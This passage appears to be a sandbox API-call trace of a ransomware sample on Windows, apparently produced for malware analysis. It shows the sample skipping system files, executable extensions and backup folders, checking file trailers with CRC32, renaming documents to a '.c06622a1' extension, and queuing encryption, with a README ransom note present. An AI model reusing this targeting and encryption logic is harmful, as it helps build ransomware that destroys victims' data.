TEqrmP4SFdFZ164.ods") returned 65 [0158.504] wcslen (_String="thumbs.db") returned 0x9 [0158.504] _wcsicmp (_Str1="386", _Str2="ods") returned -60 [0158.504] wcslen (_String="386") returned 0x3 [0158.504] _wcsicmp (_Str1="adv", _Str2="ods") returned -14 [0158.504] wcslen (_String="adv") returned 0x3 [0158.504] _wcsicmp (_Str1="ani", _Str2="ods") returned -14 [0158.504] wcslen (_String="ani") returned 0x3 [0158.504] _wcsicmp (_Str1="bat", _Str2="ods") returned -13 [0158.504] wcslen (_String="bat") returned 0x3 [0158.504] _wcsicmp (_Str1="bin", _Str2="ods") returned -13 [0158.504] wcslen (_String="bin") returned 0x3 [0158.504] _wcsicmp (_Str1="cab", _Str2="ods") returned -12 [0158.504] wcslen (_String="cab") returned 0x3 [0158.504] _wcsicmp (_Str1="cmd", _Str2="ods") returned -12 [0158.504] wcslen (_String="cmd") returned 0x3 [0158.504] _wcsicmp (_Str1="com", _Str2="ods") returned -12 [0158.504] wcslen (_String="com") returned 0x3 [0158.504] _wcsicmp (_Str1="cpl", _Str2="ods") returned -12 [0158.504] wcslen (_String="cpl") returned 0x3 [0158.504] _wcsicmp (_Str1="cur", _Str2="ods") returned -12 [0158.504] wcslen (_String="cur") returned 0x3 [0158.504] _wcsicmp (_Str1="deskthemepack", _Str2="ods") returned -11 [0158.504] wcslen (_String="deskthemepack") returned 0xd [0158.504] _wcsicmp (_Str1="diagcab", _Str2="ods") returned -11 [0158.504] wcslen (_String="diagcab") returned 0x7 [0158.504] _wcsicmp (_Str1="diagcfg", _Str2="ods") returned -11 [0158.504] wcslen (_String="diagcfg") returned 0x7 [0158.504] _wcsicmp (_Str1="diagpkg", _Str2="ods") returned -11 [0158.504] wcslen (_String="diagpkg") returned 0x7 [0158.504] _wcsicmp (_Str1="dll", _Str2="ods") returned -11 [0158.505] wcslen (_String="dll") returned 0x3 [0158.505] _wcsicmp (_Str1="drv", _Str2="ods") returned -11 [0158.505] wcslen (_String="drv") returned 0x3 [0158.505] _wcsicmp (_Str1="exe", _Str2="ods") returned -10 [0158.505] wcslen (_String="exe") returned 0x3 [0158.505] _wcsicmp (_Str1="hlp", _Str2="ods") returned -7 [0158.505] wcslen (_String="hlp") returned 0x3 [0158.505] _wcsicmp (_Str1="icl", _Str2="ods") returned -6 [0158.505] wcslen (_String="icl") returned 0x3 [0158.505] _wcsicmp (_Str1="icns", _Str2="ods") returned -6 [0158.505] wcslen (_String="icns") returned 0x4 [0158.505] _wcsicmp (_Str1="ico", _Str2="ods") returned -6 [0158.505] wcslen (_String="ico") returned 0x3 [0158.505] _wcsicmp (_Str1="ics", _Str2="ods") returned -6 [0158.505] wcslen (_String="ics") returned 0x3 [0158.505] _wcsicmp (_Str1="idx", _Str2="ods") returned -6 [0158.505] wcslen (_String="idx") returned 0x3 [0158.505] _wcsicmp (_Str1="ldf", _Str2="ods") returned -3 [0158.505] wcslen (_String="ldf") returned 0x3 [0158.505] _wcsicmp (_Str1="lnk", _Str2="ods") returned -3 [0158.505] wcslen (_String="lnk") returned 0x3 [0158.505] _wcsicmp (_Str1="mod", _Str2="ods") returned -2 [0158.505] wcslen (_String="mod") returned 0x3 [0158.505] _wcsicmp (_Str1="mpa", _Str2="ods") returned -2 [0158.505] wcslen (_String="mpa") returned 0x3 [0158.505] _wcsicmp (_Str1="msc", _Str2="ods") returned -2 [0158.505] wcslen (_String="msc") returned 0x3 [0158.505] _wcsicmp (_Str1="msp", _Str2="ods") returned -2 [0158.505] wcslen (_String="msp") returned 0x3 [0158.505] _wcsicmp (_Str1="msstyles", _Str2="ods") returned -2 [0158.505] wcslen (_String="msstyles") returned 0x8 [0158.505] _wcsicmp (_Str1="msu", _Str2="ods") returned -2 [0158.505] wcslen (_String="msu") returned 0x3 [0158.506] _wcsicmp (_Str1="nls", _Str2="ods") returned -1 [0158.506] wcslen (_String="nls") returned 0x3 [0158.506] _wcsicmp (_Str1="nomedia", _Str2="ods") returned -1 [0158.506] wcslen (_String="nomedia") returned 0x7 [0158.506] _wcsicmp (_Str1="ocx", _Str2="ods") returned -1 [0158.506] wcslen (_String="ocx") returned 0x3 [0158.506] _wcsicmp (_Str1="prf", _Str2="ods") returned 1 [0158.506] wcslen (_String="prf") returned 0x3 [0158.506] _wcsicmp (_Str1="ps1", _Str2="ods") returned 1 [0158.506] wcslen (_String="ps1") returned 0x3 [0158.506] _wcsicmp (_Str1="rom", _Str2="ods") returned 3 [0158.506] wcslen (_String="rom") returned 0x3 [0158.506] _wcsicmp (_Str1="rtp", _Str2="ods") returned 3 [0158.506] wcslen (_String="rtp") returned 0x3 [0158.506] _wcsicmp (_Str1="scr", _Str2="ods") returned 4 [0158.506] wcslen (_String="scr") returned 0x3 [0158.506] _wcsicmp (_Str1="shs", _Str2="ods") returned 4 [0158.506] wcslen (_String="shs") returned 0x3 [0158.506] _wcsicmp (_Str1="spl", _Str2="ods") returned 4 [0158.506] wcslen (_String="spl") returned 0x3 [0158.506] _wcsicmp (_Str1="sys", _Str2="ods") returned 4 [0158.506] wcslen (_String="sys") returned 0x3 [0158.506] _wcsicmp (_Str1="theme", _Str2="ods") returned 5 [0158.506] wcslen (_String="theme") returned 0x5 [0158.506] _wcsicmp (_Str1="themepack", _Str2="ods") returned 5 [0158.506] wcslen (_String="themepack") returned 0x9 [0158.506] _wcsicmp (_Str1="wpx", _Str2="ods") returned 8 [0158.506] wcslen (_String="wpx") returned 0x3 [0158.506] _wcsicmp (_Str1="lock", _Str2="ods") returned -3 [0158.506] wcslen (_String="lock") returned 0x4 [0158.506] _wcsicmp (_Str1="key", _Str2="ods") returned -4 [0158.506] wcslen (_String="key") returned 0x3 [0158.507] _wcsicmp (_Str1="hta", _Str2="ods") returned -7 [0158.507] wcslen (_String="hta") returned 0x3 [0158.507] _wcsicmp (_Str1="msi", _Str2="ods") returned -2 [0158.507] wcslen (_String="msi") returned 0x3 [0158.507] _wcsicmp (_Str1="pdb", _Str2="ods") returned 1 [0158.507] wcslen (_String="pdb") returned 0x3 [0158.507] _wcsicmp (_Str1="sqlite", _Str2="ods") returned 4 [0158.507] wcslen (_String="sqlite") returned 0x6 [0158.507] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\88lX_mh5lpPm\\uU3Lzd - buLe2_" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_6f2uodqzk-uc\\qnlgqkm9qwac\\88lx_mh5lppm\\uu3lzd - bule2_")) returned 0x10 [0158.507] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x32d00a8 [0158.507] wcscpy (in: _Dest=0x32d00a8, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\88lX_mh5lpPm\\uU3Lzd - buLe2_" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\88lX_mh5lpPm\\uU3Lzd - buLe2_") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\88lX_mh5lpPm\\uU3Lzd - buLe2_" [0158.507] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\88lX_mh5lpPm\\uU3Lzd - buLe2_") returned 0x63 [0158.507] wcscpy (in: _Dest=0x32d0170, _Source="3 TEqrmP4SFdFZ164.ods" | out: _Dest="3 TEqrmP4SFdFZ164.ods") returned="3 TEqrmP4SFdFZ164.ods" [0158.508] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\88lX_mh5lpPm\\uU3Lzd - buLe2_\\3 TEqrmP4SFdFZ164.ods", dwFileAttributes=0x80) returned 1 [0158.508] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\88lX_mh5lpPm\\uU3Lzd - buLe2_\\3 TEqrmP4SFdFZ164.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_6f2uodqzk-uc\\qnlgqkm9qwac\\88lx_mh5lppm\\uu3lzd - bule2_\\3 teqrmp4sfdfz164.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0158.508] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0158.508] ReadFile (in: hFile=0x1a8, lpBuffer=0x32e224, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32e2b4, lpOverlapped=0x0 | out: lpBuffer=0x32e224*, lpNumberOfBytesRead=0x32e2b4*=0x90, lpOverlapped=0x0) returned 1 [0158.509] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32e224, Length=0x80) returned 0x6c0f6fbf [0158.509] RtlComputeCrc32 (PartialCrc=0x6fbf, Buffer=0x32e224, Length=0x80) returned 0x48b968d7 [0158.509] RtlComputeCrc32 (PartialCrc=0x68d7, Buffer=0x32e224, Length=0x80) returned 0xdcc89e7 [0158.509] RtlComputeCrc32 (PartialCrc=0x89e7, Buffer=0x32e224, Length=0x80) returned 0x9d808635 [0158.509] RtlComputeCrc32 (PartialCrc=0x8635, Buffer=0x32e224, Length=0x80) returned 0x2ce1368d [0158.509] CloseHandle (hObject=0x1a8) returned 1 [0158.509] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x32e00b0 [0158.510] wcscpy (in: _Dest=0x32e00b0, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\88lX_mh5lpPm\\uU3Lzd - buLe2_\\3 TEqrmP4SFdFZ164.ods" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\88lX_mh5lpPm\\uU3Lzd - buLe2_\\3 TEqrmP4SFdFZ164.ods") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\88lX_mh5lpPm\\uU3Lzd - buLe2_\\3 TEqrmP4SFdFZ164.ods" [0158.510] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\88lX_mh5lpPm\\uU3Lzd - buLe2_\\3 TEqrmP4SFdFZ164.ods") returned 0x79 [0158.510] wcscpy (in: _Dest=0x32e01a2, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0158.510] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\88lX_mh5lpPm\\uU3Lzd - buLe2_\\3 TEqrmP4SFdFZ164.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_6f2uodqzk-uc\\qnlgqkm9qwac\\88lx_mh5lppm\\uu3lzd - bule2_\\3 teqrmp4sfdfz164.ods"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\88lX_mh5lpPm\\uU3Lzd - buLe2_\\3 TEqrmP4SFdFZ164.ods.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_6f2uodqzk-uc\\qnlgqkm9qwac\\88lx_mh5lppm\\uu3lzd - bule2_\\3 teqrmp4sfdfz164.ods.c06622a1"), dwFlags=0x8) returned 1 [0158.513] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\88lX_mh5lpPm\\uU3Lzd - buLe2_\\3 TEqrmP4SFdFZ164.ods.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_6f2uodqzk-uc\\qnlgqkm9qwac\\88lx_mh5lppm\\uu3lzd - bule2_\\3 teqrmp4sfdfz164.ods.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1a8 [0158.513] CreateIoCompletionPort (FileHandle=0x1a8, ExistingCompletionPort=0x130, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x130 [0158.513] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x3990020 [0158.521] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x46008181 [0158.521] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x46125b65 [0158.521] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x638e03db [0158.521] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x214231a6 [0158.521] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x7e7cc08f [0158.521] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x4d444155 [0158.521] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x3b0beed4 [0158.521] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x68a55d0a [0158.524] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3990094, Length=0x80) returned 0xeebce7e3 [0158.524] RtlComputeCrc32 (PartialCrc=0xe7e3, Buffer=0x3990094, Length=0x80) returned 0xa275a143 [0158.524] RtlComputeCrc32 (PartialCrc=0xa143, Buffer=0x3990094, Length=0x80) returned 0x80d39f23 [0158.525] RtlComputeCrc32 (PartialCrc=0x9f23, Buffer=0x3990094, Length=0x80) returned 0xdd9c1072 [0158.525] RtlComputeCrc32 (PartialCrc=0x1072, Buffer=0x3990094, Length=0x80) returned 0x17c81d8e [0158.525] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3990020) returned 1 [0158.525] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x32d00a8) returned 1 [0158.525] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x32e00b0) returned 1 [0158.525] FindNextFileW (in: hFindFile=0x154248, lpFindFileData=0x32e39c | out: lpFindFileData=0x32e39c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8c2bb4e0, ftCreationTime.dwHighDateTime=0x1d6eb2b, ftLastAccessTime.dwLowDateTime=0x8c2bb4e0, ftLastAccessTime.dwHighDateTime=0x1d6eb2b, ftLastWriteTime.dwLowDateTime=0x8c2bb4e0, ftLastWriteTime.dwHighDateTime=0x1d6eb2b, nFileSizeHigh=0x0, nFileSizeLow=0x7ca, dwReserved0=0x0, dwReserved1=0x0, cFileName="README.c06622a1.TXT", cAlternateFileName="README~1.TXT")) returned 1 [0158.525] _wcsicmp (_Str1="README.c06622a1.TXT", _Str2="README.c06622a1.TXT") returned 0 [0158.525] FindNextFileW (in: hFindFile=0x154248, lpFindFileData=0x32e39c | out: lpFindFileData=0x32e39c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0158.525] FindClose (in: hFindFile=0x154248 | out: hFindFile=0x154248) returned 1 [0158.525] _wcsicmp (_Str1="backup", _Str2="uU3Lzd - buLe2_") returned -19 [0158.525] wcslen (_String="backup") returned 0x6 [0158.525] _wcsicmp (_Str1="bak", _Str2="uU3Lzd - buLe2_") returned -19 [0158.525] wcslen (_String="bak") returned 0x3 [0158.525] _wcsicmp (_Str1="back", _Str2="uU3Lzd - buLe2_") returned -19 [0158.525] wcslen (_String="back") returned 0x4 [0158.525] _wcsicmp (_Str1="archive", _Str2="uU3Lzd - buLe2_") returned -20 [0158.525] wcslen (_String="archive") returned 0x7 [0158.526] _wcsicmp (_Str1="bckp", _Str2="uU3Lzd - buLe2_") returned -19 [0158.526] wcslen (_String="bckp") returned 0x4 [0158.526] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x32a0090) returned 1 [0158.527] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x32b0098) returned 1 [0158.528] FindNextFileW (in: hFindFile=0x154208, lpFindFileData=0x32e61c | out: lpFindFileData=0x32e61c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x37136cd0, ftCreationTime.dwHighDateTime=0x1d5d7b5, ftLastAccessTime.dwLowDateTime=0xa103d7d0, ftLastAccessTime.dwHighDateTime=0x1d5d84e, ftLastWriteTime.dwLowDateTime=0xa103d7d0, ftLastWriteTime.dwHighDateTime=0x1d5d84e, nFileSizeHigh=0x0, nFileSizeLow=0xf2f4, dwReserved0=0x0, dwReserved1=0x0, cFileName="ZthHbGzL_PjU.ppt", cAlternateFileName="ZTHHBG~1.PPT")) returned 1 [0158.528] _wcsicmp (_Str1="ZthHbGzL_PjU.ppt", _Str2="README.c06622a1.TXT") returned 8 [0158.528] wcsstr (_Str="ZthHbGzL_PjU.ppt", _SubStr="README") returned 0x0 [0158.528] _wcsicmp (_Str1="autorun.inf", _Str2="ZthHbGzL_PjU.ppt") returned -25 [0158.528] wcslen (_String="autorun.inf") returned 0xb [0158.528] _wcsicmp (_Str1="boot.ini", _Str2="ZthHbGzL_PjU.ppt") returned -24 [0158.528] wcslen (_String="boot.ini") returned 0x8 [0158.528] _wcsicmp (_Str1="bootfont.bin", _Str2="ZthHbGzL_PjU.ppt") returned -24 [0158.528] wcslen (_String="bootfont.bin") returned 0xc [0158.528] _wcsicmp (_Str1="bootsect.bak", _Str2="ZthHbGzL_PjU.ppt") returned -24 [0158.528] wcslen (_String="bootsect.bak") returned 0xc [0158.528] _wcsicmp (_Str1="desktop.ini", _Str2="ZthHbGzL_PjU.ppt") returned -22 [0158.529] wcslen (_String="desktop.ini") returned 0xb [0158.529] _wcsicmp (_Str1="iconcache.db", _Str2="ZthHbGzL_PjU.ppt") returned -17 [0158.529] wcslen (_String="iconcache.db") returned 0xc [0158.529] _wcsicmp (_Str1="ntldr", _Str2="ZthHbGzL_PjU.ppt") returned -12 [0158.529] wcslen (_String="ntldr") returned 0x5 [0158.529] _wcsicmp (_Str1="ntuser.dat", _Str2="ZthHbGzL_PjU.ppt") returned -12 [0158.529] wcslen (_String="ntuser.dat") returned 0xa [0158.529] _wcsicmp (_Str1="ntuser.dat.log", _Str2="ZthHbGzL_PjU.ppt") returned -12 [0158.529] wcslen (_String="ntuser.dat.log") returned 0xe [0158.529] _wcsicmp (_Str1="ntuser.ini", _Str2="ZthHbGzL_PjU.ppt") returned -12 [0158.529] wcslen (_String="ntuser.ini") returned 0xa [0158.529] _wcsicmp (_Str1="thumbs.db", _Str2="ZthHbGzL_PjU.ppt") returned -6 [0158.529] wcslen (_String="thumbs.db") returned 0x9 [0158.529] _wcsicmp (_Str1="386", _Str2="ppt") returned -61 [0158.529] wcslen (_String="386") returned 0x3 [0158.529] _wcsicmp (_Str1="adv", _Str2="ppt") returned -15 [0158.529] wcslen (_String="adv") returned 0x3 [0158.529] _wcsicmp (_Str1="ani", _Str2="ppt") returned -15 [0158.529] wcslen (_String="ani") returned 0x3 [0158.529] _wcsicmp (_Str1="bat", _Str2="ppt") returned -14 [0158.529] wcslen (_String="bat") returned 0x3 [0158.529] _wcsicmp (_Str1="bin", _Str2="ppt") returned -14 [0158.529] wcslen (_String="bin") returned 0x3 [0158.529] _wcsicmp (_Str1="cab", _Str2="ppt") returned -13 [0158.529] wcslen (_String="cab") returned 0x3 [0158.529] _wcsicmp (_Str1="cmd", _Str2="ppt") returned -13 [0158.529] wcslen (_String="cmd") returned 0x3 [0158.529] _wcsicmp (_Str1="com", _Str2="ppt") returned -13 [0158.530] wcslen (_String="com") returned 0x3 [0158.530] _wcsicmp (_Str1="cpl", _Str2="ppt") returned -13 [0158.530] wcslen (_String="cpl") returned 0x3 [0158.530] _wcsicmp (_Str1="cur", _Str2="ppt") returned -13 [0158.530] wcslen (_String="cur") returned 0x3 [0158.530] _wcsicmp (_Str1="deskthemepack", _Str2="ppt") returned -12 [0158.530] wcslen (_String="deskthemepack") returned 0xd [0158.530] _wcsicmp (_Str1="diagcab", _Str2="ppt") returned -12 [0158.530] wcslen (_String="diagcab") returned 0x7 [0158.530] _wcsicmp (_Str1="diagcfg", _Str2="ppt") returned -12 [0158.530] wcslen (_String="diagcfg") returned 0x7 [0158.530] _wcsicmp (_Str1="diagpkg", _Str2="ppt") returned -12 [0158.530] wcslen (_String="diagpkg") returned 0x7 [0158.530] _wcsicmp (_Str1="dll", _Str2="ppt") returned -12 [0158.530] wcslen (_String="dll") returned 0x3 [0158.530] _wcsicmp (_Str1="drv", _Str2="ppt") returned -12 [0158.530] wcslen (_String="drv") returned 0x3 [0158.530] _wcsicmp (_Str1="exe", _Str2="ppt") returned -11 [0158.530] wcslen (_String="exe") returned 0x3 [0158.530] _wcsicmp (_Str1="hlp", _Str2="ppt") returned -8 [0158.530] wcslen (_String="hlp") returned 0x3 [0158.530] _wcsicmp (_Str1="icl", _Str2="ppt") returned -7 [0158.530] wcslen (_String="icl") returned 0x3 [0158.530] _wcsicmp (_Str1="icns", _Str2="ppt") returned -7 [0158.530] wcslen (_String="icns") returned 0x4 [0158.530] _wcsicmp (_Str1="ico", _Str2="ppt") returned -7 [0158.530] wcslen (_String="ico") returned 0x3 [0158.531] _wcsicmp (_Str1="ics", _Str2="ppt") returned -7 [0158.531] wcslen (_String="ics") returned 0x3 [0158.531] _wcsicmp (_Str1="idx", _Str2="ppt") returned -7 [0158.531] wcslen (_String="idx") returned 0x3 [0158.531] _wcsicmp (_Str1="ldf", _Str2="ppt") returned -4 [0158.531] wcslen (_String="ldf") returned 0x3 [0158.531] _wcsicmp (_Str1="lnk", _Str2="ppt") returned -4 [0158.531] wcslen (_String="lnk") returned 0x3 [0158.531] _wcsicmp (_Str1="mod", _Str2="ppt") returned -3 [0158.531] wcslen (_String="mod") returned 0x3 [0158.531] _wcsicmp (_Str1="mpa", _Str2="ppt") returned -3 [0158.531] wcslen (_String="mpa") returned 0x3 [0158.531] _wcsicmp (_Str1="msc", _Str2="ppt") returned -3 [0158.531] wcslen (_String="msc") returned 0x3 [0158.531] _wcsicmp (_Str1="msp", _Str2="ppt") returned -3 [0158.531] wcslen (_String="msp") returned 0x3 [0158.531] _wcsicmp (_Str1="msstyles", _Str2="ppt") returned -3 [0158.531] wcslen (_String="msstyles") returned 0x8 [0158.531] _wcsicmp (_Str1="msu", _Str2="ppt") returned -3 [0158.531] wcslen (_String="msu") returned 0x3 [0158.531] _wcsicmp (_Str1="nls", _Str2="ppt") returned -2 [0158.531] wcslen (_String="nls") returned 0x3 [0158.531] _wcsicmp (_Str1="nomedia", _Str2="ppt") returned -2 [0158.531] wcslen (_String="nomedia") returned 0x7 [0158.531] _wcsicmp (_Str1="ocx", _Str2="ppt") returned -1 [0158.531] wcslen (_String="ocx") returned 0x3 [0158.531] _wcsicmp (_Str1="prf", _Str2="ppt") returned 2 [0158.531] wcslen (_String="prf") returned 0x3 [0158.532] _wcsicmp (_Str1="ps1", _Str2="ppt") returned 3 [0158.532] wcslen (_String="ps1") returned 0x3 [0158.532] _wcsicmp (_Str1="rom", _Str2="ppt") returned 2 [0158.532] wcslen (_String="rom") returned 0x3 [0158.532] _wcsicmp (_Str1="rtp", _Str2="ppt") returned 2 [0158.532] wcslen (_String="rtp") returned 0x3 [0158.532] _wcsicmp (_Str1="scr", _Str2="ppt") returned 3 [0158.532] wcslen (_String="scr") returned 0x3 [0158.532] _wcsicmp (_Str1="shs", _Str2="ppt") returned 3 [0158.532] wcslen (_String="shs") returned 0x3 [0158.532] _wcsicmp (_Str1="spl", _Str2="ppt") returned 3 [0158.532] wcslen (_String="spl") returned 0x3 [0158.532] _wcsicmp (_Str1="sys", _Str2="ppt") returned 3 [0158.532] wcslen (_String="sys") returned 0x3 [0158.532] _wcsicmp (_Str1="theme", _Str2="ppt") returned 4 [0158.532] wcslen (_String="theme") returned 0x5 [0158.532] _wcsicmp (_Str1="themepack", _Str2="ppt") returned 4 [0158.532] wcslen (_String="themepack") returned 0x9 [0158.532] _wcsicmp (_Str1="wpx", _Str2="ppt") returned 7 [0158.532] wcslen (_String="wpx") returned 0x3 [0158.532] _wcsicmp (_Str1="lock", _Str2="ppt") returned -4 [0158.532] wcslen (_String="lock") returned 0x4 [0158.532] _wcsicmp (_Str1="key", _Str2="ppt") returned -5 [0158.532] wcslen (_String="key") returned 0x3 [0158.532] _wcsicmp (_Str1="hta", _Str2="ppt") returned -8 [0158.532] wcslen (_String="hta") returned 0x3 [0158.533] _wcsicmp (_Str1="msi", _Str2="ppt") returned -3 [0158.533] wcslen (_String="msi") returned 0x3 [0158.533] _wcsicmp (_Str1="pdb", _Str2="ppt") returned -12 [0158.533] wcslen (_String="pdb") returned 0x3 [0158.533] _wcsicmp (_Str1="sqlite", _Str2="ppt") returned 3 [0158.533] wcslen (_String="sqlite") returned 0x6 [0158.533] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\88lX_mh5lpPm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_6f2uodqzk-uc\\qnlgqkm9qwac\\88lx_mh5lppm")) returned 0x10 [0158.533] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x32a0090 [0158.533] wcscpy (in: _Dest=0x32a0090, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\88lX_mh5lpPm" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\88lX_mh5lpPm") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\88lX_mh5lpPm" [0158.533] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\88lX_mh5lpPm") returned 0x53 [0158.533] wcscpy (in: _Dest=0x32a0138, _Source="ZthHbGzL_PjU.ppt" | out: _Dest="ZthHbGzL_PjU.ppt") returned="ZthHbGzL_PjU.ppt" [0158.533] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\88lX_mh5lpPm\\ZthHbGzL_PjU.ppt", dwFileAttributes=0x80) returned 1 [0158.533] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\88lX_mh5lpPm\\ZthHbGzL_PjU.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_6f2uodqzk-uc\\qnlgqkm9qwac\\88lx_mh5lppm\\zthhbgzl_pju.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x194 [0158.533] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0158.534] ReadFile (in: hFile=0x194, lpBuffer=0x32e4a4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32e534, lpOverlapped=0x0 | out: lpBuffer=0x32e4a4*, lpNumberOfBytesRead=0x32e534*=0x90, lpOverlapped=0x0) returned 1 [0158.567] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32e4a4, Length=0x80) returned 0x8ca5ef42 [0158.567] RtlComputeCrc32 (PartialCrc=0xef42, Buffer=0x32e4a4, Length=0x80) returned 0xe8c57715 [0158.567] RtlComputeCrc32 (PartialCrc=0x7715, Buffer=0x32e4a4, Length=0x80) returned 0x91c9fcf7 [0158.567] RtlComputeCrc32 (PartialCrc=0xfcf7, Buffer=0x32e4a4, Length=0x80) returned 0x89fc6d65 [0158.567] RtlComputeCrc32 (PartialCrc=0x6d65, Buffer=0x32e4a4, Length=0x80) returned 0x45524562 [0158.567] CloseHandle (hObject=0x194) returned 1 [0158.568] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x32b0098 [0158.568] wcscpy 